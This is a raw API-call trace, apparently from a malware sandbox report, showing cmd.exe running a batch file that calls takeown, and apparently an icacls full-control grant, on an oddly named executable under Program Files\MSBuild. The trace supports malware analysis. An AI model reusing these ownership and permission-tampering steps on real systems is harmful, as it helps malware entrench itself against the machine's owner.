lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\takeown.*", fInfoLevelId=0x1, lpFindFileData=0x19e6d8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19e6d8) returned 0xffffffff [0285.370] GetLastError () returned 0x2 [0285.370] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0285.370] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\takeown.*", fInfoLevelId=0x1, lpFindFileData=0x19e6d8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19e6d8) returned 0x510b68 [0285.370] FindClose (in: hFindFile=0x510b68 | out: hFindFile=0x510b68) returned 1 [0285.370] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\takeown.COM", fInfoLevelId=0x1, lpFindFileData=0x19e6d8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19e6d8) returned 0xffffffff [0285.370] GetLastError () returned 0x2 [0285.370] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\takeown.EXE", fInfoLevelId=0x1, lpFindFileData=0x19e6d8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19e6d8) returned 0x510b68 [0285.370] FindClose (in: hFindFile=0x510b68 | out: hFindFile=0x510b68) returned 1 [0285.370] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0285.370] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0285.370] GetConsoleTitleW (in: lpConsoleTitle=0x19ebcc, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0285.371] InitializeProcThreadAttributeList (in: lpAttributeList=0x19eaf8, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x19eadc | out: lpAttributeList=0x19eaf8, lpSize=0x19eadc) returned 1 [0285.371] UpdateProcThreadAttribute (in: lpAttributeList=0x19eaf8, dwFlags=0x0, Attribute=0x60001, lpValue=0x19eae4, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x19eaf8, lpPreviousValue=0x0) returned 1 [0285.371] GetStartupInfoW (in: lpStartupInfo=0x19eb30 | out: lpStartupInfo=0x19eb30*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0285.371] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0285.371] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0285.371] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0285.371] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0285.371] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0285.371] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0285.371] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0285.371] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0285.371] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0285.371] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0285.371] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0285.371] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0285.371] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0285.371] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0285.371] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0285.371] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0285.371] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0285.371] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0285.371] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0285.371] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0285.371] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0285.371] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0285.371] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0285.371] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0285.371] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0285.371] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0285.371] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0285.371] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0285.372] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0285.372] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0285.372] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0285.372] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0285.372] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0285.372] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0285.372] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0285.372] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0285.372] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0285.372] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0285.372] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0285.372] lstrcmpW (lpString1="\\takeown.exe", lpString2="\\XCOPY.EXE") returned -1 [0285.372] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\takeown.exe", lpCommandLine="takeown /F \"C:\\Program Files\\MSBuild\\expenditurevincenttablet.exe\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpStartupInfo=0x19ea80*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="takeown /F \"C:\\Program Files\\MSBuild\\expenditurevincenttablet.exe\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x19eacc | out: lpCommandLine="takeown /F \"C:\\Program Files\\MSBuild\\expenditurevincenttablet.exe\"", lpProcessInformation=0x19eacc*(hProcess=0xb0, hThread=0xb8, dwProcessId=0x5b8, dwThreadId=0x7f0)) returned 1 [0285.380] CloseHandle (hObject=0xb8) returned 1 [0285.380] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0285.380] GetEnvironmentStringsW () returned 0x51b2e8* [0285.380] FreeEnvironmentStringsA (penv="=") returned 1 [0285.380] WaitForSingleObject (hHandle=0xb0, dwMilliseconds=0xffffffff) returned 0x0 [0288.380] GetExitCodeProcess (in: hProcess=0xb0, lpExitCode=0x19ea64 | out: lpExitCode=0x19ea64*=0x0) returned 1 [0288.380] CloseHandle (hObject=0xb0) returned 1 [0288.380] _vsnwprintf (in: _Buffer=0x19eb4c, _BufferCount=0x13, _Format="%08X", _ArgList=0x19ea6c | out: _Buffer="00000000") returned 8 [0288.380] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0288.380] GetEnvironmentStringsW () returned 0x51b2e8* [0288.381] FreeEnvironmentStringsA (penv="=") returned 1 [0288.381] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0288.381] GetEnvironmentStringsW () returned 0x51b2e8* [0288.381] FreeEnvironmentStringsA (penv="=") returned 1 [0288.381] DeleteProcThreadAttributeList (in: lpAttributeList=0x19eaf8 | out: lpAttributeList=0x19eaf8) [0288.381] _get_osfhandle (_FileHandle=1) returned 0x3c [0288.381] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0288.498] _get_osfhandle (_FileHandle=1) returned 0x3c [0288.498] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x13fe40c | out: lpMode=0x13fe40c) returned 1 [0288.498] _get_osfhandle (_FileHandle=0) returned 0x38 [0288.498] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x13fe408 | out: lpMode=0x13fe408) returned 1 [0288.498] SetConsoleInputExeNameW () returned 0x1 [0288.499] GetConsoleOutputCP () returned 0x1b5 [0288.499] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x13fe460 | out: lpCPInfo=0x13fe460) returned 1 [0288.499] SetThreadUILanguage (LangId=0x0) returned 0x409 [0288.499] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\vrnqnmbw.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x19f28c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0288.499] _open_osfhandle (_OSFileHandle=0xb0, _Flags=8) returned 3 [0288.499] _get_osfhandle (_FileHandle=3) returned 0xb0 [0288.499] SetFilePointer (in: hFile=0xb0, lDistanceToMove=47, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x2f [0288.500] _get_osfhandle (_FileHandle=3) returned 0xb0 [0288.500] SetFilePointer (in: hFile=0xb0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2f [0288.500] ReadFile (in: hFile=0xb0, lpBuffer=0x140a960, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x19f25c, lpOverlapped=0x0 | out: lpBuffer=0x140a960*, lpNumberOfBytesRead=0x19f25c*=0xb3, lpOverlapped=0x0) returned 1 [0288.500] SetFilePointer (in: hFile=0xb0, lDistanceToMove=63, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x3f [0288.500] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x140a960, cbMultiByte=16, lpWideCharStr=0x13f57e0, cchWideChar=8191 | out: lpWideCharStr="set FN=\"%~nx1\"\r\nUSERNAME%:F /C\r\n") returned 16 [0288.500] _get_osfhandle (_FileHandle=3) returned 0xb0 [0288.500] GetFileType (hFile=0xb0) returned 0x1 [0288.500] _get_osfhandle (_FileHandle=3) returned 0xb0 [0288.500] SetFilePointer (in: hFile=0xb0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x3f [0288.500] GetFullPathNameW (in: lpFileName="C:\\Program Files\\MSBuild\\expenditurevincenttablet.exe", nBufferLength=0x208, lpBuffer=0x19e9d8, lpFilePart=0x19e99c | out: lpBuffer="C:\\Program Files\\MSBuild\\expenditurevincenttablet.exe", lpFilePart=0x19e99c*="expenditurevincenttablet.exe") returned 0x35 [0288.500] FindFirstFileW (in: lpFileName="C:\\Program Files", lpFindFileData=0x19e6e0 | out: lpFindFileData=0x19e6e0) returned 0x510b68 [0288.500] FindClose (in: hFindFile=0x510b68 | out: hFindFile=0x510b68) returned 1 [0288.500] _wcsnicmp (_String1="PROGRA~1", _String2="Program Files", _MaxCount=0xd) returned 17 [0288.501] FindFirstFileW (in: lpFileName="C:\\Program Files\\MSBuild", lpFindFileData=0x19e6e0 | out: lpFindFileData=0x19e6e0) returned 0x510b68 [0288.501] FindClose (in: hFindFile=0x510b68 | out: hFindFile=0x510b68) returned 1 [0288.501] FindFirstFileW (in: lpFileName="C:\\Program Files\\MSBuild\\expenditurevincenttablet.exe", lpFindFileData=0x19e6e0 | out: lpFindFileData=0x19e6e0) returned 0x510b68 [0288.501] FindClose (in: hFindFile=0x510b68 | out: hFindFile=0x510b68) returned 1 [0288.501] _wcsnicmp (_String1="EXPEND~1.EXE", _String2="expenditurevincenttablet.exe", _MaxCount=0x1c) returned 21 [0288.501] _wcsicmp (_String1="set", _String2=")") returned 74 [0288.501] _wcsicmp (_String1="FOR", _String2="set") returned -13 [0288.501] _wcsicmp (_String1="FOR/?", _String2="set") returned -13 [0288.501] _wcsicmp (_String1="IF", _String2="set") returned -10 [0288.501] _wcsicmp (_String1="IF/?", _String2="set") returned -10 [0288.501] _wcsicmp (_String1="REM", _String2="set") returned -1 [0288.501] _wcsicmp (_String1="REM/?", _String2="set") returned -1 [0288.501] _tell (_FileHandle=3) returned 63 [0288.501] _close (_FileHandle=3) returned 0 [0288.502] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x19f020 | out: _Buffer="\r\n") returned 2 [0288.502] _get_osfhandle (_FileHandle=1) returned 0x3c [0288.502] GetFileType (hFile=0x3c) returned 0x2 [0288.502] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0288.502] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x19eff8 | out: lpMode=0x19eff8) returned 1 [0288.502] _get_osfhandle (_FileHandle=1) returned 0x3c [0288.502] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x19f010, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0x19f010*=0x2) returned 1 [0288.502] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0288.502] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1406720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0288.502] _vsnwprintf (in: _Buffer=0x13f9be0, _BufferCount=0x3fe, _Format="%s", _ArgList=0x19f01c | out: _Buffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 29 [0288.502] _vsnwprintf (in: _Buffer=0x13f9c1a, _BufferCount=0x3e1, _Format="%c", _ArgList=0x19f01c | out: _Buffer=">") returned 1 [0288.502] _get_osfhandle (_FileHandle=1) returned 0x3c [0288.502] GetFileType (hFile=0x3c) returned 0x2 [0288.502] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0288.502] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x19effc | out: lpMode=0x19effc) returned 1 [0288.503] _get_osfhandle (_FileHandle=1) returned 0x3c [0288.503] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x13f9be0*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0x19f014, lpReserved=0x0 | out: lpBuffer=0x13f9be0*, lpNumberOfCharsWritten=0x19f014*=0x1e) returned 1 [0288.503] _get_osfhandle (_FileHandle=1) returned 0x3c [0288.503] GetFileType (hFile=0x3c) returned 0x2 [0288.503] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0288.503] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x19f29c | out: lpMode=0x19f29c) returned 1 [0288.503] _get_osfhandle (_FileHandle=1) returned 0x3c [0288.503] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x528430*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0x19f2b4, lpReserved=0x0 | out: lpBuffer=0x528430*, lpNumberOfCharsWritten=0x19f2b4*=0x3) returned 1 [0288.503] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x19f2bc | out: _Buffer=" FN=\"expenditurevincenttablet.exe\" ") returned 35 [0288.503] _get_osfhandle (_FileHandle=1) returned 0x3c [0288.503] GetFileType (hFile=0x3c) returned 0x2 [0288.503] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0288.503] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x19f294 | out: lpMode=0x19f294) returned 1 [0288.504] _get_osfhandle (_FileHandle=1) returned 0x3c [0288.504] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x23, lpNumberOfCharsWritten=0x19f2ac, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0x19f2ac*=0x23) returned 1 [0288.504] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x19f2d0 | out: _Buffer="\r\n") returned 2 [0288.504] _get_osfhandle (_FileHandle=1) returned 0x3c [0288.504] GetFileType (hFile=0x3c) returned 0x2 [0288.504] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0288.504] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x19f2a8 | out: lpMode=0x19f2a8) returned 1 [0288.561] _get_osfhandle (_FileHandle=1) returned 0x3c [0288.561] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x19f2c0, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0x19f2c0*=0x2) returned 1 [0288.939] _wcsicmp (_String1="set", _String2="DIR") returned 15 [0288.939] _wcsicmp (_String1="set", _String2="ERASE") returned 14 [0288.940] _wcsicmp (_String1="set", _String2="DEL") returned 15 [0288.940] _wcsicmp (_String1="set", _String2="TYPE") returned -1 [0288.940] _wcsicmp (_String1="set", _String2="COPY") returned 16 [0288.940] _wcsicmp (_String1="set", _String2="CD") returned 16 [0288.940] _wcsicmp (_String1="set", _String2="CHDIR") returned 16 [0288.940] _wcsicmp (_String1="set", _String2="RENAME") returned 1 [0288.940] _wcsicmp (_String1="set", _String2="REN") returned 1 [0288.940] _wcsicmp (_String1="set", _String2="ECHO") returned 14 [0288.940] _wcsicmp (_String1="set", _String2="SET") returned 0 [0288.940] GetConsoleTitleW (in: lpConsoleTitle=0x19ee40, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0289.898] _wcsicmp (_String1="set", _String2="DIR") returned 15 [0289.898] _wcsicmp (_String1="set", _String2="ERASE") returned 14 [0289.898] _wcsicmp (_String1="set", _String2="DEL") returned 15 [0289.898] _wcsicmp (_String1="set", _String2="TYPE") returned -1 [0289.898] _wcsicmp (_String1="set", _String2="COPY") returned 16 [0289.898] _wcsicmp (_String1="set", _String2="CD") returned 16 [0289.898] _wcsicmp (_String1="set", _String2="CHDIR") returned 16 [0289.898] _wcsicmp (_String1="set", _String2="RENAME") returned 1 [0289.898] _wcsicmp (_String1="set", _String2="REN") returned 1 [0289.898] _wcsicmp (_String1="set", _String2="ECHO") returned 14 [0289.898] _wcsicmp (_String1="set", _String2="SET") returned 0 [0289.898] wcsncmp (_String1="FN", _String2="/", _MaxCount=0x4) returned 23 [0289.898] _wcsnicmp (_String1="FN", _String2="/A", _MaxCount=0x2) returned 55 [0289.898] _wcsnicmp (_String1="FN", _String2="/P", _MaxCount=0x2) returned 55 [0289.898] SetEnvironmentVariableW (lpName="FN", lpValue="\"expenditurevincenttablet.exe\"") returned 1 [0289.898] GetEnvironmentStringsW () returned 0x51b2e8* [0289.898] FreeEnvironmentStringsA (penv="=") returned 1 [0289.898] _get_osfhandle (_FileHandle=1) returned 0x3c [0289.898] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0290.270] _get_osfhandle (_FileHandle=1) returned 0x3c [0290.270] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x13fe40c | out: lpMode=0x13fe40c) returned 1 [0290.345] _get_osfhandle (_FileHandle=0) returned 0x38 [0290.345] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x13fe408 | out: lpMode=0x13fe408) returned 1 [0290.385] SetConsoleInputExeNameW () returned 0x1 [0290.385] GetConsoleOutputCP () returned 0x1b5 [0290.611] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x13fe460 | out: lpCPInfo=0x13fe460) returned 1 [0290.611] SetThreadUILanguage (LangId=0x0) returned 0x409 [0290.644] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\vrnqnmbw.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x19f28c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0290.644] _open_osfhandle (_OSFileHandle=0xb0, _Flags=8) returned 3 [0290.644] _get_osfhandle (_FileHandle=3) returned 0xb0 [0290.644] SetFilePointer (in: hFile=0xb0, lDistanceToMove=63, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x3f [0290.644] _get_osfhandle (_FileHandle=3) returned 0xb0 [0290.644] SetFilePointer (in: hFile=0xb0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x3f [0290.644] ReadFile (in: hFile=0xb0, lpBuffer=0x140a960, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x19f25c, lpOverlapped=0x0 | out: lpBuffer=0x140a960*, lpNumberOfBytesRead=0x19f25c*=0xa3, lpOverlapped=0x0) returned 1 [0290.644] SetFilePointer (in: hFile=0xb0, lDistanceToMove=78, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x4e [0290.644] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x140a960, cbMultiByte=15, lpWideCharStr=0x13f57e0, cchWideChar=8191 | out: lpWideCharStr="cd /d \"%~dp0\"\r\n\nUSERNAME%:F /C\r\n") returned 15 [0290.644] _get_osfhandle (_FileHandle=3) returned 0xb0 [0290.644] GetFileType (hFile=0xb0) returned 0x1 [0290.644] _get_osfhandle (_FileHandle=3) returned 0xb0 [0290.644] SetFilePointer (in: hFile=0xb0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4e [0290.645] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat", nBufferLength=0x208, lpBuffer=0x19e9d8, lpFilePart=0x19e99c | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat", lpFilePart=0x19e99c*="vRnqNMBW.bat") returned 0x2a [0290.645] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x19e6e0 | out: lpFindFileData=0x19e6e0) returned 0x510b68 [0290.645] FindClose (in: hFindFile=0x510b68 | out: hFindFile=0x510b68) returned 1 [0290.645] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps", lpFindFileData=0x19e6e0 | out: lpFindFileData=0x19e6e0) returned 0x510b68 [0290.645] FindClose (in: hFindFile=0x510b68 | out: hFindFile=0x510b68) returned 1 [0290.645] _wcsnicmp (_String1="CIIHMN~1", _String2="CIiHmnxMn6Ps", _MaxCount=0xc) returned 6 [0290.645] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFindFileData=0x19e6e0 | out: lpFindFileData=0x19e6e0) returned 0x510b68 [0290.645] FindClose (in: hFindFile=0x510b68 | out: hFindFile=0x510b68) returned 1 [0290.645] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat", lpFindFileData=0x19e6e0 | out: lpFindFileData=0x19e6e0) returned 0x510b68 [0290.645] FindClose (in: hFindFile=0x510b68 | out: hFindFile=0x510b68) returned 1 [0290.645] _wcsicmp (_String1="cd", _String2=")") returned 58 [0290.645] _wcsicmp (_String1="FOR", _String2="cd") returned 3 [0290.645] _wcsicmp (_String1="FOR/?", _String2="cd") returned 3 [0290.645] _wcsicmp (_String1="IF", _String2="cd") returned 6 [0290.646] _wcsicmp (_String1="IF/?", _String2="cd") returned 6 [0290.646] _wcsicmp (_String1="REM", _String2="cd") returned 15 [0290.646] _wcsicmp (_String1="REM/?", _String2="cd") returned 15 [0290.646] _tell (_FileHandle=3) returned 78 [0290.646] _close (_FileHandle=3) returned 0 [0290.646] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x19f020 | out: _Buffer="\r\n") returned 2 [0290.646] _get_osfhandle (_FileHandle=1) returned 0x3c [0290.646] GetFileType (hFile=0x3c) returned 0x2 [0290.646] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0290.646] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x19eff8 | out: lpMode=0x19eff8) returned 1 [0290.658] _get_osfhandle (_FileHandle=1) returned 0x3c [0290.658] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x19f010, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0x19f010*=0x2) returned 1 [0290.860] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0290.860] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1406720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0290.860] _vsnwprintf (in: _Buffer=0x13f9be0, _BufferCount=0x3fe, _Format="%s", _ArgList=0x19f01c | out: _Buffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 29 [0290.860] _vsnwprintf (in: _Buffer=0x13f9c1a, _BufferCount=0x3e1, _Format="%c", _ArgList=0x19f01c | out: _Buffer=">") returned 1 [0290.860] _get_osfhandle (_FileHandle=1) returned 0x3c [0290.860] GetFileType (hFile=0x3c) returned 0x2 [0290.860] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0290.860] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x19effc | out: lpMode=0x19effc) returned 1 [0290.953] _get_osfhandle (_FileHandle=1) returned 0x3c [0290.953] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x13f9be0*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0x19f014, lpReserved=0x0 | out: lpBuffer=0x13f9be0*, lpNumberOfCharsWritten=0x19f014*=0x1e) returned 1 [0291.226] _get_osfhandle (_FileHandle=1) returned 0x3c [0291.226] GetFileType (hFile=0x3c) returned 0x2 [0291.226] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0291.226] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x19f29c | out: lpMode=0x19f29c) returned 1 [0291.273] _get_osfhandle (_FileHandle=1) returned 0x3c [0291.273] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x5283e8*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x19f2b4, lpReserved=0x0 | out: lpBuffer=0x5283e8*, lpNumberOfCharsWritten=0x19f2b4*=0x2) returned 1 [0291.640] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x19f2bc | out: _Buffer=" /d \"C:\\Users\\CIiHmnxMn6Ps\\Desktop\\\" ") returned 37 [0291.640] _get_osfhandle (_FileHandle=1) returned 0x3c [0291.640] GetFileType (hFile=0x3c) returned 0x2 [0291.640] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0291.641] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x19f294 | out: lpMode=0x19f294) returned 1 [0291.840] _get_osfhandle (_FileHandle=1) returned 0x3c [0291.840] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x25, lpNumberOfCharsWritten=0x19f2ac, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0x19f2ac*=0x25) returned 1 [0292.273] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x19f2d0 | out: _Buffer="\r\n") returned 2 [0292.273] _get_osfhandle (_FileHandle=1) returned 0x3c 